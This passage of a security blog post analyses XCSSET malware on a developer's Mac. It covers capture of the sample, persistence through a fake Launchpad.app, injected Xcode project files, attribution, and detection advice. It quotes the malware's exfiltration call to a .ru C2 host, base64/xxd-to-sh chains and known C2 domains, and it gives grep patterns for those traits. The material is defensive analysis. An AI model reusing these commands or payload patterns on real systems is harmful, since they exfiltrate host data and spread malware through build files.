<strong>Spotting the malware<\/strong><\/h3>\n\n\n\n<p>It started with a routine <strong>ps<\/strong> check \u2013 nothing exotic, just a standard look at what was running on the machine. But one line stood out immediately:<\/p>\n\n\n\n<div class=\"htmlAdexBlock\">\n<style>\n  .wrap {\n    background: #ffffff;\n    padding: 40px 28px;\n    border-radius: 16px;\n    max-width: 860px;\n    margin: 0 auto;\n    border: 1px solid #e8eaf5;\n  }\n\n  .code-block {\n    background: #fafbff;\n    border: 1px solid #e8eaf5;\n    border-radius: 12px;\n    overflow: hidden;\n  }\n\n  .code-topbar {\n    display: flex;\n    align-items: center;\n    gap: 6px;\n    padding: 10px 16px;\n    background: #f2f4fc;\n    border-bottom: 1px solid #e8eaf5;\n  }\n\n  .dot { width: 10px; height: 10px; border-radius: 50%; }\n  .dot-r { background: #FF5F57; }\n  .dot-y { background: #FEBC2E; }\n  .dot-g { background: #28C840; }\n\n  .code-body {\n    padding: 18px 24px;\n    overflow-x: auto;\n  }\n\n  .code-body pre {\n    font-family: 'JetBrains Mono', monospace;\n    font-size: 13px;\n    line-height: 1.6;\n    white-space: pre;\n  }\n\n  .t-cmd  { color: #0F0063; font-weight: 500; }\n  .t-path { color: #00A696; }\n  .t-arg  { color: #FF645A; }\n<\/style>\n<div class=\"wrap\">\n  <div class=\"code-block\">\n    <div class=\"code-topbar\">\n      <div class=\"dot dot-r\"><\/div>\n      <div class=\"dot dot-y\"><\/div>\n      <div class=\"dot dot-g\"><\/div>\n    <\/div>\n    <div class=\"code-body\">\n      <pre><span class=\"t-cmd\">osascript<\/span> <span class=\"t-path\">\/tmp\/jl<\/span> <span class=\"t-arg\">&lt;~2KB base64-like argument&gt;<\/span><\/pre>\n    <\/div>\n  <\/div>\n<\/div>\n\n\n\n<p>And then another. And another.<\/p>\n\n\n\n<p>osascript is Apple&#8217;s built-in interpreter for AppleScript \u2013 a legitimate tool, but not one that should be spawning repeatedly from \/tmp. 
That directory is for throwaway temp files; no well-behaved application drops executables there. The argument attached to each call was massive and looked encoded.&nbsp;<\/p>\n\n\n\n<p>The processes themselves were short-lived, disappearing almost as fast as they appeared, yet they kept coming back, which meant something was relaunching them on a schedule.<\/p>\n\n\n\n<p>The file at the center of it all, \/tmp\/jl, was even harder to pin down. It existed for only a few milliseconds at a time \u2013 long enough to be executed, gone before it could be read.<\/p>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\"\/>\n\n\n\n<h3 class=\"wp-block-heading\" id=\"2-capturing-the-live-sample\">2. Capturing the live sample<\/h3>\n\n\n\n<p>Capturing it didn&#8217;t require any specialized tooling. The file was too fast to catch by hand, so instead, a simple polling loop was set to watch for it:<\/p>\n\n\n\n<div class=\"htmlAdexBlock\">\n    <div class=\"wrap\">\n        <div class=\"code-block\">\n            <div class=\"code-body\">\n                <pre><span class=\"t-kw\">while<\/span> <span class=\"t-kw\">true<\/span><span class=\"t-op\">;<\/span> <span class=\"t-kw\">do<\/span> <span class=\"t-op\">[ -f<\/span> <span class=\"t-path\">\/tmp\/jl<\/span> <span class=\"t-op\">]<\/span> <span class=\"t-op\">&amp;&amp;<\/span> <span class=\"t-cmd\">cp<\/span> <span class=\"t-flag\">-f<\/span> <span class=\"t-path\">\/tmp\/jl<\/span> <span class=\"t-path\">\/tmp\/jl.bak<\/span><span class=\"t-op\">;<\/span> <span class=\"t-cmd\">sleep<\/span> <span class=\"t-flag\">0.1<\/span><span class=\"t-op\">;<\/span> <span class=\"t-kw\">done<\/span><\/pre>\n            <\/div>\n        <\/div>\n    <\/div>\n<\/div>\n\n\n\n\n<p>Every 100 milliseconds, check if \/tmp\/jl exists. If it does, copy it to \/tmp\/jl.bak before it disappears. That&#8217;s it.<\/p>\n\n\n\n<p>Within seconds, the trap worked. The copy landed, and for the first time, the file stayed still long enough to be examined.<\/p>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\"\/>\n\n\n\n<h3 class=\"wp-block-heading\" id=\"3-analyzing-the-specimen\">3. 
Analyzing the specimen<\/h3>\n\n\n\n<p>With the copy in hand, the first step was simple identification:<\/p>\n\n\n\n<div>\n<div class=\"wrap\">\n  <div class=\"code-block\">\n    <div class=\"code-body\">\n      <pre><span class=\"t-cmd\">file<\/span> <span class=\"t-path\">\/tmp\/jl.bak<\/span><\/pre>\n    <\/div>\n  <\/div>\n<\/div>\n\n\n\n<p>The output: a compiled AppleScript \u2013 binary .scpt format. Not human-readable as-is, but that was expected. What wasn&#8217;t expected was what was layered inside.<\/p>\n\n\n\n<p>The script&#8217;s logic followed a familiar pattern for obfuscated malware: extract a packed payload, base64-decode it, and execute it.&nbsp;<\/p>\n\n\n\n<p>Unpacking those inner base64 blocks revealed a second layer, and this one was doing real work. 
A shell script, responsible for quietly building a detailed fingerprint of the machine:<\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li>Username and locale<\/li>\n\n\n\n<li>macOS version and CPU architecture<\/li>\n\n\n\n<li>SIP (System Integrity Protection) status<\/li>\n\n\n\n<li>Mac serial number<\/li>\n\n\n\n<li>Chrome extension manifests, and the Chrome binary itself, if present<\/li>\n<\/ul>\n\n\n\n<p>Everything gets bundled into a JSON object and shipped out via a single curl call:<\/p>\n\n\n\n<div class=\"htmlAdexBlock\">\n<div class=\"wrap\">\n  <div class=\"code-block\">\n    <div class=\"code-body\">\n      <pre><span class=\"t-cmd\">curl<\/span> <span class=\"t-flag\">-fksL<\/span> <span class=\"t-flag\">-m<\/span> <span class=\"t-num\">6<\/span> <span class=\"t-url\">https:\/\/riggletoy.ru\/l<\/span><\/pre>\n    <\/div>\n  <\/div>\n<\/div>\n<\/div>\n\n\n\n<p>The -k flag tells curl to skip TLS certificate verification. It&#8217;s a small detail, but a telling one: a well-resourced operation doesn&#8217;t skip TLS validation. This is the signature of a hastily configured C2.<\/p>\n\n\n\n<p>The embedded config made the architecture even clearer: domain: &#8220;riggletoy.ru&#8221;, moduleName: &#8220;lbwbl&#8221;, entryPoint: &#8220;Terminal&#8221;, userLocale: &#8220;en_CY&#8221;.&nbsp;<\/p>\n\n\n\n<p>This wasn&#8217;t a standalone piece of malware \u2013 it was one module inside a larger, modular framework.&nbsp;<\/p>\n\n\n    <div class=\"block__quote\"><p class=\"block__quote_desc\">The domain itself returned nothing in public threat intelligence feeds at the time of discovery. It wasn&#8217;t burned, wasn&#8217;t flagged \u2013 it was quietly operational.<\/p><\/div>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\"\/>\n\n\n\n<h3 class=\"wp-block-heading\" id=\"4-locating-the-persistence-mechanism-and-mapping-the-damage\">4. Locating the persistence mechanism and mapping the damage<\/h3>\n\n\n\n<p>Short-lived processes that keep reappearing don&#8217;t restart themselves; something is launching them. The next step was to find it.<\/p>\n\n\n\n<p>The usual suspects were checked one by one: LaunchAgents, LaunchDaemons, git hooks, .zshrc, Dock entries, Xcode toolchains. 
And there, buried deep in a cache directory, was a counterfeit Launchpad:<\/p>\n\n\n\n<div class=\"htmlAdexBlock\">\n    <div class=\"wrap\">\n        <div class=\"code-block\">\n            <div class=\"code-body\">\n                <pre><span class=\"t-home\">~<\/span><span class=\"t-path\">\/Library\/Caches\/jaq.kuugp.dirzpf\/<\/span><span class=\"t-app\">Launchpad.app<\/span><\/pre>\n            <\/div>\n        <\/div>\n    <\/div>\n<\/div>\n\n\n\n<p>The real Launchpad lives at \/System\/Applications\/Launchpad.app, protected by SIP \u2013 Apple&#8217;s system integrity layer that prevents modification of core system files. Anything calling itself Launchpad.app outside of that path isn&#8217;t Launchpad. The location alone was enough to confirm it.<\/p>\n\n\n\n<p>This is precisely what <a href=\"https:\/\/www.microsoft.com\/en-us\/security\/blog\/2025\/03\/11\/new-xcsset-malware-adds-new-obfuscation-persistence-techniques-to-infect-xcode-projects\/\" target=\"_blank\" rel=\"noreferrer noopener nofollow\">Microsoft documented in March 2025 as the &#8220;dock method&#8221;<\/a>: plant a fake Launchpad in the user&#8217;s space, then use dockutil to silently rewrite the Dock entry. From that point on, every click on the Dock icon launches two things at once: the real app and the malware. The user sees nothing unusual.<\/p>\n\n\n\n<p>With persistence mapped, one question remained: how many Xcode projects had been touched? 
A single scan across the home directory answered it:<\/p>\n\n\n\n<div class=\"htmlAdexBlock\">\n<div class=\"wrap\">\n  <div class=\"code-block\">\n    <div class=\"code-body\">\n      <pre><span class=\"t-cmd\">find<\/span> <span class=\"t-home\">~<\/span> <span class=\"t-flag\">-path<\/span> <span class=\"t-string\">\"*\/*.xcodeproj\/project.pbxproj\"<\/span> <span class=\"t-op\">\\<\/span>\n  <span class=\"t-flag\">-type f<\/span> <span class=\"t-flag\">-print0<\/span> <span class=\"t-redir\">2>\/dev\/null<\/span> <span class=\"t-op\">| \\<\/span>\n  <span class=\"t-cmd\">xargs<\/span> <span class=\"t-flag\">-0<\/span> <span class=\"t-cmd\">rg<\/span> <span class=\"t-flag\">-l -S<\/span> <span class=\"t-string\">\"(\\|\\s*(sh|bash)\\b|xxd\\s+-p\\s+-r|base64\\s+--decode|>\/dev\/null\\s+2>&amp;1\\s*&amp;)\"<\/span><\/pre>\n    <\/div>\n  <\/div>\n<\/div>\n<\/div>\n\n\n\n<p>Over 20 projects came back positive. Every single one had been modified in the exact same minute: not roughly the same time, the same minute. That&#8217;s not a user action. That&#8217;s one automated trigger sweeping the entire home directory in a single pass, silently injecting itself into every Xcode project it could reach.<\/p>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\"\/>\n\n\n\n<h2 class=\"wp-block-heading\" id=\"building-the-protection-mechanisms\">Building the Protection Mechanisms<\/h2>\n\n\n\n<p>A full picture of how the malware worked was valuable: every mechanism XCSSET relied on could now be turned against it. The same behavior that made it dangerous (predictable persistence points, recognizable file patterns, consistent network calls) also made it detectable.<\/p>\n\n\n\n<p>The key here isn&#8217;t the sequence of steps \u2013 it&#8217;s the loop.<\/p>\n\n\n\n<figure class=\"wp-block-image size-full\"><a href=\"https:\/\/adex.com\/blog\/wp-content\/uploads\/2026\/04\/adex-xcsset-scheme.png\"><img decoding=\"async\" width=\"1461\" height=\"1076\" src=\"https:\/\/adex.com\/blog\/wp-content\/uploads\/2026\/04\/adex-xcsset-scheme.png\" alt=\"adex-xcsset-scheme\" class=\"wp-image-5533\" srcset=\"https:\/\/adex.com\/blog\/wp-content\/uploads\/2026\/04\/adex-xcsset-scheme.png 1461w, https:\/\/adex.com\/blog\/wp-content\/uploads\/2026\/04\/adex-xcsset-scheme-300x221.png 300w, https:\/\/adex.com\/blog\/wp-content\/uploads\/2026\/04\/adex-xcsset-scheme-1024x754.png 1024w, https:\/\/adex.com\/blog\/wp-content\/uploads\/2026\/04\/adex-xcsset-scheme-768x566.png 768w\" sizes=\"(max-width: 1461px) 100vw, 1461px\" \/><\/a><\/figure>\n\n\n\n<p>Every persistence mechanism has one job: survive. And it does this aggressively. 
Whenever the opportunity arises (a new shell session, a Dock click, a git operation), the dropper sweeps the entire home directory and rewrites every Xcode project it can find.&nbsp;<\/p>\n\n\n\n<p>That&#8217;s what makes a single-project cleanup pointless. Remove the injection from one .xcodeproj, reopen Xcode, hit Build, and the next trigger puts it straight back. The infection doesn&#8217;t live in the projects. It lives in the persistence layer.<\/p>\n\n\n\n<p><strong>The only path to clean remediation, in order:<\/strong><\/p>\n\n\n\n<ol class=\"wp-block-list\">\n<li><strong>Remove all autostart points<\/strong>: the fake Launchpad.app in <strong>~\/Library\/Caches<\/strong>, <strong>LaunchAgent<\/strong> and <strong>LaunchDaemon<\/strong> entries, the injected line in <strong>~\/.zshrc<\/strong>, global git hooks<\/li>\n\n\n\n<li><strong>Reboot<\/strong><\/li>\n\n\n\n<li><strong>Only then<\/strong> restore Xcode projects from a known-clean git state<\/li>\n<\/ol>\n\n\n\n<p>Microsoft and Loginsoft&#8217;s technical breakdown of the 2025 variant <a href=\"https:\/\/www.loginsoft.com\/post\/xcsset-reloaded-smarter-stealthier-stronger\" target=\"_blank\" rel=\"noreferrer noopener nofollow\">describes the full chain as four stages<\/a>: a malicious build script triggers unpacking, which fetches a second-stage payload from C2, which then loads additional modules on demand.&nbsp;<\/p>\n\n\n\n<p>What&#8217;s actually running on a given machine at a given moment depends entirely on what the C2 decides to deliver.<\/p>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\"\/>\n\n\n\n<h2 class=\"wp-block-heading\" id=\"why-our-sample-is-almost-certainly-xcsset\">Why Our Sample Is Almost Certainly XCSSET<\/h2>\n\n\n\n<p>How can we be certain that our specimen is really XCSSET?<\/p>\n\n\n\n<p>No single indicator is conclusive on its own. An osascript process running from \/tmp could be legitimate developer tooling. 
A base64-encoded AppleScript could be someone&#8217;s own automation script. A Chrome binary being accessed could be a routine extension manager.<\/p>\n\n\n\n<p>But what about seven of these indicators appearing together: behavioral, structural, network, and persistence mechanisms, all matching documented XCSSET patterns, in the same binary, with the same architecture?&nbsp;<\/p>\n\n\n\n<div class=\"xa-wrap htmlAdexBlock\">\n    <div class=\"xa-inner\">\n        <div class=\"xa-label\">Attribution Analysis \u00b7 XCSSET 2025<\/div>\n        <div class=\"xa-conf-card\">\n            <div class=\"xa-conf-score\">7 \/ 7<\/div>\n            <div class=\"xa-conf-detail\">\n                <div class=\"xa-conf-title\">Independent indicators matched<\/div>\n                <div class=\"xa-conf-sub\">\n                    Each row maps a direct observation against peer-reviewed\n                    vendor and threat intelligence reports.\n                <\/div>\n            <\/div>\n        <\/div>\n\n        <div class=\"xa-table-wrap\">\n            <table class=\"xa-table\">\n                <thead>\n                    <tr>\n                        <th>What We Observed<\/th>\n                        <th>What Public Reports Describe<\/th>\n                        <th>Source<\/th>\n                    <\/tr>\n                <\/thead>\n                <tbody>\n                    <tr>\n                        <td class=\"xa-observed\">\n                            <span class=\"xa-row-num\">1<\/span\n                            ><code>osascript \/tmp\/jl &lt;base64&gt;<\/code>\n                            visible in the live process list\n                        <\/td>\n                        <td 
class=\"xa-described\">\n                            XCSSET executes encoded AppleScript payloads via\n                            <code>osascript<\/code> directly from\n                            <code>\/tmp<\/code> \u2014 avoiding persistent writes and\n                            evading file-based scanners\n                        <\/td>\n                        <td class=\"xa-source\">\n                            <span>Microsoft, Mar 2025<\/span\n                            ><span>MITRE S0658<\/span>\n                        <\/td>\n                    <\/tr>\n                    <tr>\n                        <td class=\"xa-observed\">\n                            <span class=\"xa-row-num\">2<\/span>Compiled\n                            <code>.scpt<\/code> containing internal base64\n                            blocks, decoded at runtime via\n                            <code>base64 --decode<\/code>\n                        <\/td>\n                        <td class=\"xa-described\">\n                            Multi-layer base64 encoding inside compiled\n                            AppleScript has been a deliberate obfuscation\n                            strategy since XCSSET&#8217;s first documented appearance\n                            \u2014 designed to defeat static analysis\n                        <\/td>\n                        <td class=\"xa-source\">\n                            <span>SentinelOne, 2022<\/span\n                            ><span>Loginsoft, 2025<\/span>\n                        <\/td>\n                    <\/tr>\n                    <tr>\n                        <td class=\"xa-observed\">\n                            <span class=\"xa-row-num\">3<\/span>Payload config with\n                            structured fields: <code>domain<\/code>,\n                            <code>moduleName<\/code>, <code>entryPoint<\/code>,\n                            <code>userLocale<\/code>\n                        <\/td>\n                        
<td class=\"xa-described\">\n                            Modular architecture with dynamic sub-module loading\n                            controlled by a runtime config. Modules are fetched\n                            and executed based on target machine profile\n                        <\/td>\n                        <td class=\"xa-source\">\n                            <span>Microsoft, Sep 2025<\/span>\n                        <\/td>\n                    <\/tr>\n                    <tr>\n                        <td class=\"xa-observed\">\n                            <span class=\"xa-row-num\">4<\/span>Enumeration of\n                            installed Chrome extensions; direct read attempt of\n                            the Chrome binary\n                        <\/td>\n                        <td class=\"xa-described\">\n                            Standard browser-targeting module covers Chrome,\n                            Opera, Brave, and Yandex. The 2025 variant added\n                            Firefox. Primary goal: session hijacking and cookie\n                            theft via extension injection\n                        <\/td>\n                        <td class=\"xa-source\">\n                            <span>Trend Micro, 2021<\/span>\n                        <\/td>\n                    <\/tr>\n                    <tr>\n                        <td class=\"xa-observed\">\n                            <span class=\"xa-row-num\">5<\/span>Exfiltration via\n                            <code>curl -fksL<\/code> (TLS verification bypassed)\n                            to a <code>.ru<\/code> domain\n                        <\/td>\n                        <td class=\"xa-described\">\n                            XCSSET has registered clusters of\n                            <code>.ru<\/code> C2 infrastructure since 2022. 
Known\n                            2025 domains include <code>castlenet.ru<\/code>,\n                            <code>cdnroute.ru<\/code>, <code>adobecdn.ru<\/code>,\n                            and over a dozen others. TLS bypass is consistent\n                            across all known variants\n                        <\/td>\n                        <td class=\"xa-source\">\n                            <span>SentinelOne, 2022<\/span\n                            ><span>Joshi, 2025<\/span>\n                        <\/td>\n                    <\/tr>\n                    <tr>\n                        <td class=\"xa-observed\">\n                            <span class=\"xa-row-num\">6<\/span>Fake\n                            <code>Launchpad.app<\/code> dropped into\n                            <code>~\/Library\/Caches\/<\/code>\n                        <\/td>\n                        <td class=\"xa-described\">\n                            The &#8220;Dock method&#8221;: a fake Launchpad app is placed in\n                            Caches and registered with the Dock via\n                            <code>dockutil<\/code>, guaranteeing execution on\n                            every login without requiring root privileges\n                        <\/td>\n                        <td class=\"xa-source\">\n                            <span>Microsoft, Mar 2025<\/span>\n                        <\/td>\n                    <\/tr>\n                    <tr>\n                        <td class=\"xa-observed\">\n                            <span class=\"xa-row-num\">7<\/span>20+ distinct Xcode\n                            projects modified within a single minute\n                        <\/td>\n                        <td class=\"xa-described\">\n                            Mass injection of all discoverable\n                            <code>.xcodeproj<\/code> files in the home directory\n                            is triggered by the auto-propagation module \u2014 the\n    
                        mechanism that turns every infected machine into a\n                            supply-chain node\n                        <\/td>\n                        <td class=\"xa-source\">\n                            <span>Microsoft, Mar 2025<\/span>\n                        <\/td>\n                    <\/tr>\n                <\/tbody>\n            <\/table>\n        <\/div>\n\n        <div class=\"xa-footnote\">\n            <strong>On attribution confidence:<\/strong> Each of the seven\n            indicators above is independently documented across multiple vendor\n            reports spanning 2021\u20132025. Their simultaneous presence in a single\n            sample \u2014 combined with consistent architectural patterns (compiled\n            AppleScript, modular runtime config, <code>.ru<\/code> C2\n            infrastructure, Dock-based persistence) \u2014 places attribution\n            confidence well above the threshold for formal identification.\n        <\/div>\n    <\/div>\n<\/div>\n\n\n\n<p>What the table above establishes is not just identity \u2013 it is an operational state. The sample wasn&#8217;t dormant or partially deployed; every layer of XCSSET&#8217;s known architecture was active simultaneously: obfuscation, persistence, browser targeting, the C2 channel, and the propagation mechanism.&nbsp;<\/p>\n\n\n\n<p>That last point matters most. The 20+ modified Xcode projects mean this machine had already become a distribution node, silently embedding XCSSET into codebases that would eventually reach other developers. 
By the time behavioral detection flagged the sample, the infection had moved beyond the single host.<\/p>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\"\/>\n\n\n\n<h2 class=\"wp-block-heading\" id=\"for-developers-what-to-check-right-now\">For Developers: What to Check Right Now<\/h2>\n\n\n\n<p>XCSSET requires no special privileges and leaves no obvious traces in the places most developers think to look. The checklist below is ordered by effort: the first three items take under five minutes and, together, cover the majority of known infection vectors.<\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li>Never open an unfamiliar Xcode project in Xcode before manually inspecting its build phases. Opening project.pbxproj as plain text is safe. Clicking Build is not.<\/li>\n<\/ul>\n\n\n\n<ul class=\"wp-block-list\">\n<li>Periodically scan your home directory for XCSSET signatures. The command below is read-only; it does not touch anything. No output means you&#8217;re clean; any output means read it carefully.<\/li>\n<\/ul>\n\n\n\n<div class=\"htmlAdexBlock\">\n    <style>\n        .cb-block {\n            background: #fafbff;\n            border: 1px solid #e8eaf5;\n            border-radius: 12px;\n            overflow: hidden;\n            max-width: 860px;\n        }\n        .cb-topbar {\n            display: flex;\n            align-items: center;\n            gap: 6px;\n            padding: 10px 16px;\n            background: #f2f4fc;\n            border-bottom: 1px solid #e8eaf5;\n        }\n        .cb-dot {\n            width: 10px;\n            height: 10px;\n            border-radius: 50%;\n        }\n        .cb-dot-r {\n            background: #ff5f57;\n        }\n        .cb-dot-y {\n            background: #febc2e;\n        }\n        .cb-dot-g {\n            background: #28c840;\n        }\n        .cb-body {\n            padding: 20px 24px;\n            overflow-x: auto;\n        }\n        .cb-body pre {\n            font-family: 
\"JetBrains Mono\", monospace;\n            font-size: 13px;\n            line-height: 1.8;\n            white-space: pre;\n            color: #555;\n            margin: 0;\n        }\n        .cb-cmd {\n            color: #0f0063;\n            font-weight: 500;\n        }\n        .cb-path {\n            color: #00a696;\n        }\n        .cb-arg {\n            color: #ff645a;\n        }\n        .cb-op {\n            color: #9b59b6;\n            font-weight: 500;\n        }\n        .cb-cmt {\n            color: #aaa;\n            font-style: italic;\n        }\n    <\/style>\n\n    <div class=\"cb-block\">\n        <div class=\"cb-topbar\">\n            <div class=\"cb-dot cb-dot-r\"><\/div>\n            <div class=\"cb-dot cb-dot-y\"><\/div>\n            <div class=\"cb-dot cb-dot-g\"><\/div>\n        <\/div>\n        <div class=\"cb-body\">\n            <pre><span class=\"cb-cmd\">find<\/span> ~ \\( \\\n  <span class=\"cb-arg\">-path<\/span> <span class=\"cb-path\">\"*\/*.xcodeproj\/project.pbxproj\"<\/span> \\\n  <span class=\"cb-op\">-o<\/span> <span class=\"cb-arg\">-path<\/span> <span class=\"cb-path\">\"*\/.git\/hooks\/*\"<\/span> \\\n  <span class=\"cb-op\">-o<\/span> <span class=\"cb-arg\">-path<\/span> <span class=\"cb-path\">\"*\/.husky\/*\"<\/span> \\\n  <span class=\"cb-op\">-o<\/span> <span class=\"cb-arg\">-path<\/span> <span class=\"cb-path\">\"*\/Library\/LaunchAgents\/*.plist\"<\/span> \\\n\\) <span class=\"cb-arg\">-type f -print0<\/span> <span class=\"cb-cmt\">2>\/dev\/null<\/span> | \\\n<span class=\"cb-cmd\">xargs<\/span> <span class=\"cb-arg\">-0<\/span> <span class=\"cb-cmd\">rg<\/span> <span class=\"cb-arg\">-n --no-heading -S<\/span> \\\n  <span class=\"cb-path\">\"(curl[^\\n]*\\|\\s*(sh|bash)|wget\\b|osascript\\b|osacompile\\b|base64\\b.*(--decode|-d)|\\\npython\\s+-c\\b|node\\s+-e\\b|\/tmp\/|plutil\\b[^\\n]*LSUIElement|launchctl\\b)\"<\/span><\/pre>\n        <\/div>\n    <\/div>\n<\/div>\n\n\n\n\n<ul start=\"3\" 
class=\"wp-block-list\">\n<li>Check your global git hooks: <code>git config --global --get core.hooksPath<\/code>. If it returns anything, inspect the directory it points to.<br><\/li>\n\n\n\n<li>Run behavioral monitoring. On macOS, the free options worth knowing are an outbound firewall that prompts on each new connection and a persistence monitor that alerts on any attempt to register a launch item. <a href=\"https:\/\/objective-see.org\/\" target=\"_blank\" rel=\"noreferrer noopener nofollow\">Objective-See<\/a> and similar research communities publish well-maintained tools of this kind regularly.<br><\/li>\n\n\n\n<li>Do not disable SIP on a development machine for convenience. System Integrity Protection is the primary barrier between malware of this class and your system files. The convenience is not worth it.<br><\/li>\n\n\n\n<li>For teams: keep all project.pbxproj files in git and commit them after every intentional change. XCSSET infects every project it finds in under a minute \u2014 any modified file will immediately show up in <code>git status<\/code>. To check all pbxproj files in a repository at once: <code>git diff --name-only -- '**\/*.pbxproj'<\/code>.<br><\/li>\n<\/ul>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\"\/>\n\n\n\n<h2 class=\"wp-block-heading\" id=\"for-organizations-detection-containment-and-policy\">For Organizations: Detection, Containment, and Policy<\/h2>\n\n\n<div class=\"block__bord\"><div class=\"block__bord_desc\"><p>Individual hygiene is not enough when developer machines are shared infrastructure. 
At the organizational level, XCSSET prioritizes supply-chain risk over endpoint risk: a single compromised workstation can quietly embed malicious build steps into repositories that are then cloned, built, and shipped downstream.<\/p>\n<\/div><\/div>\n<style>\n.block__bord { margin: 32px 0; padding: 1.25em 2.375em;\tborder-radius: 24px; background: rgba(0, 220, 200, 0.20); }\n.block__bord_desc {font-size: 16px !important;font-weight: 400 !important;color: #606060 !important;}\n<\/style>\n\n\n\n<ul class=\"wp-block-list\">\n<li><strong>Do not rely solely on antivirus.<\/strong> XCSSET has evaded signature-based detection for years. The infection lives inside plain-text build files; execution happens through standard developer tooling that no scanner will flag on sight.<br><\/li>\n\n\n\n<li><strong>Deploy EDR with a behavioral model on developer machines.<\/strong> Key triggers to configure: osascript launched from \/tmp, curl connecting to low-reputation or newly registered domains, and modifications to launch agents not initiated through MDM.<br><\/li>\n\n\n\n<li><strong>Audit third-party SDKs and dependencies.<\/strong> Know which external Xcode projects your CI pipeline builds, who added them, and whether their build phases contain any code you did not write and cannot trace.<br><\/li>\n\n\n\n<li><strong>Lock down developer machines via MDM.<\/strong> Block application installation from arbitrary DMGs, enforce signing requirements on launch agent plists, and monitor changes to core.hooksPath across the fleet.<br><\/li>\n\n\n\n<li><strong>Rotate API tokens regularly<\/strong>: cloud providers and git services. If any developer machine was compromised, every token that existed on it should be treated as leaked.<br><\/li>\n\n\n\n<li><strong>Incident response order matters.<\/strong> On confirmed infection, do not start by cleaning individual projects. 
First, remove the persistence points \u2013 the fake Launchpad app, any rogue launch agents, .zshrc injections, and git hooks \u2013 then reboot, and only then restore affected projects from a known-clean git state. Reversing that order leaves the malware in place while you work.<br><\/li>\n<\/ul>\n\n\n\n<p>The common thread across both sections is timing. XCSSET&#8217;s effectiveness depends almost entirely on going unnoticed long enough to propagate: through your projects, through your team, and eventually through your users.&nbsp;<\/p>\n\n\n\n<p>The behaviors described above are not difficult to detect once you know what to look for; the threat persists because most developers never think to look.&nbsp;<\/p>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\"\/>\n\n\n\n<h2 class=\"wp-block-heading\" id=\"infected-repositories-on-github-xcsset-in-the-wild\">Infected Repositories on GitHub: XCSSET in the Wild<\/h2>\n\n\n\n<p>The most straightforward way to find XCSSET samples is not a malware repository or a threat intelligence feed \u2013 it is GitHub&#8217;s own code search.&nbsp;<\/p>\n\n\n\n<p>At the time of writing, authenticated dork queries return 24 repositories containing live payload chains, several of them committed within days of this investigation. Three examples are examined in detail below with fully decoded payloads; the complete list follows.<\/p>\n\n\n\n<h3 class=\"wp-block-heading\" id=\"example-1-princemittal1-demoforauthflow\"><strong>Example 1: <\/strong><a href=\"https:\/\/github.com\/PrinceMittal1\/DemoForAuthFlow\" target=\"_blank\" rel=\"noreferrer noopener nofollow\"><strong>PrinceMittal1\/DemoForAuthFlow<\/strong><\/a><\/h3>\n\n\n\n<p>A React Native application with an iOS target. 
In <a href=\"https:\/\/github.com\/PrinceMittal1\/DemoForAuthFlow\/blob\/d5c7dec978eff6a71b0df4ddffc7a3c92c8eb1e5\/ios\/DemoForAuthFlow.xcodeproj\/project.pbxproj#L337\" target=\"_blank\" rel=\"noreferrer noopener nofollow\">ios\/DemoForAuthFlow.xcodeproj\/project.pbxproj<\/a>, lines 337\u2013381, there are six distinct payload blocks.&nbsp;<\/p>\n\n\n\n<p>What makes this sample particularly notable is that both obfuscation variants are present simultaneously \u2013 <code>base64 -D | base64 -D | base64 -D | sh<\/code> and <code>xxd -p -r | xxd -p -r | xxd -p -r | sh<\/code> \u2013 with iteration depth reaching five rounds, specifically to defeat static analysis on the first pass.<\/p>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\"\/>\n\n\n\n<h3 class=\"wp-block-heading\" id=\"example-2-zzzznick-dummy-ios\"><strong>Example 2: <\/strong><a href=\"https:\/\/github.com\/zzzznick\/dummy-ios\" target=\"_blank\" rel=\"noreferrer noopener nofollow\"><strong>zzzznick\/dummy-ios<\/strong><\/a><\/h3>\n\n\n\n<p>By its name, this appears to be a throwaway test repository, but it contains a live infection.&nbsp;<\/p>\n\n\n\n<p>The file <a href=\"https:\/\/github.com\/zzzznick\/dummy-ios\/blob\/6d2d9b2a4acb513ce5ce1d04c9462b28ce38b834\/demo\/ABiteOfMouthFeastBook_5.28\/ABiteOfMouthFeastBook.xcodeproj\/project.pbxproj#L452\" target=\"_blank\" rel=\"noreferrer noopener nofollow\">demo\/ABiteOfMouthFeastBook_5.28\/ABiteOfMouthFeastBook.xcodeproj\/project.pbxproj<\/a>, lines 452\u2013614, holds a dozen payload blocks, each chained as four rounds of <code>base64 -D<\/code> piped into <code>sh<\/code>.&nbsp;<\/p>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\"\/>\n\n\n\n<h3 class=\"wp-block-heading\" id=\"example-3-dvillegastech-reaxbd\"><strong>Example 3: <\/strong><a href=\"https:\/\/github.com\/dvillegastech\/ReaxBD\" target=\"_blank\" rel=\"noreferrer noopener nofollow\"><strong>dvillegastech\/ReaxBD<\/strong><\/a><\/h3>\n\n\n\n<p><em>(<a href=\"https:\/\/github.com\/dvillegastech\/ReaxBD\/issues\/6\" target=\"_blank\" 
